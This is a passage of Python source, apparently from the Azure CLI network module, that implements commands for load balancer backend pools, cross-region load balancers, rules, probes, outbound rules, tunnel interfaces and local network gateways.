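    # group, e.g. (illustrative names) 'myVnet' ->
    # '/subscriptions/<sub-id>/resourceGroups/myGroup/providers/Microsoft.Network/virtualNetworks/myVnet'.
    # Full resource IDs are passed through unchanged.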
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
            raise UnrecognizedArgumentError('A vnet must be provided when a subnet is specified by name instead of by ID.')
subnet = vnet + f'/subnets/{subnet}'
return subnet
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
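    # Illustrative config-file entry (keys are the ones read below; values are made up):
    # {'name': 'addr1', 'ip_address': '10.0.0.4', 'virtual_network': '<vnet name or ID>', 'subnet': '<subnet name or ID>'}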
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
    # Before API version 2020-03-01 the service does not support the dedicated backend address pool
    # operations, so fall back to updating the load balancer itself for backward compatibility.
    # The same applies to Basic SKU load balancers, which the service does not allow to use the
    # dedicated operations.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
    # when the SKU is 'gateway', 'tunnelInterfaces' can't be None; otherwise the service returns an error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def set_lb_backend_address_pool(cmd, instance, resource_group_name, vnet=None, backend_addresses=None,
backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
if new_addresses:
instance.load_balancer_backend_addresses = new_addresses
return instance
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
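    # Cross-region load balancers are always Standard SKU with a Global tier frontend, so these
    # values are fixed here rather than exposed as parameters.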
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
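    # For a cross-region load balancer, each backend address references the frontend IP configuration
    # of a regional load balancer rather than a VM or NIC address.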
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise CLIError('Each backend address must have name and frontend_ip_configuration information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
    # To keep compatibility when bumping the API version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
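    # From API version 2020-11-01 a backend address must reference either a virtual network (with an
    # optional subnet) or a full subnet resource ID; older API versions only accept a virtual network
    # reference.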
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet name | subnet id) information.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
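    """Add a health probe to an existing load balancer and return the created probe.

    Illustrative CLI invocation (values are placeholders):

        az network lb probe create -g MyGroup --lb-name MyLb -n MyProbe --protocol Http --port 80 --path /health
    """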
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
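    """Create a load-balancing rule on an existing load balancer.

    When the frontend IP configuration or backend pool name is omitted, the load
    balancer's single entry is used as the default. When multiple pool names are
    passed via backend_pools_name, the plural backend_address_pools property is set
    and the singular one is cleared, because the service rejects both being set with
    different values. Illustrative CLI invocation (values are placeholders):

        az network lb rule create -g MyGroup --lb-name MyLb -n MyRule --protocol Tcp --frontend-port 80 --backend-port 80
    """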
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
    # avoid breaking when backend_address_pool_name is None but backend_pools_name is provided
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
        # Otherwise the service responds with the error: (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
        # To keep backward compatibility when bumping the API version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
        # Otherwise the service responds with the error: (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
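    """Append a gateway load balancer tunnel interface to a backend address pool.

    Illustrative CLI invocation (values are placeholders):

        az network lb address-pool tunnel-interface add -g MyGroup --lb-name MyLb --address-pool MyPool --protocol VXLAN --identifier 901 --type Internal --port 10700
    """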
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range; please provide a valid index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range; please provide a valid index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
            instance.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address, peer_weight=peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
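    """Create a local network gateway, attaching BGP settings when any of asn,
    bgp_peering_address or peer_weight is provided.

    Illustrative CLI invocation (values are placeholders):

        az network local-gateway create -g MyGroup -n MyLocalGateway --gateway-ip-address 203.0.113.10 --local-address-prefixes 10.0.0.0/24
    """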
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
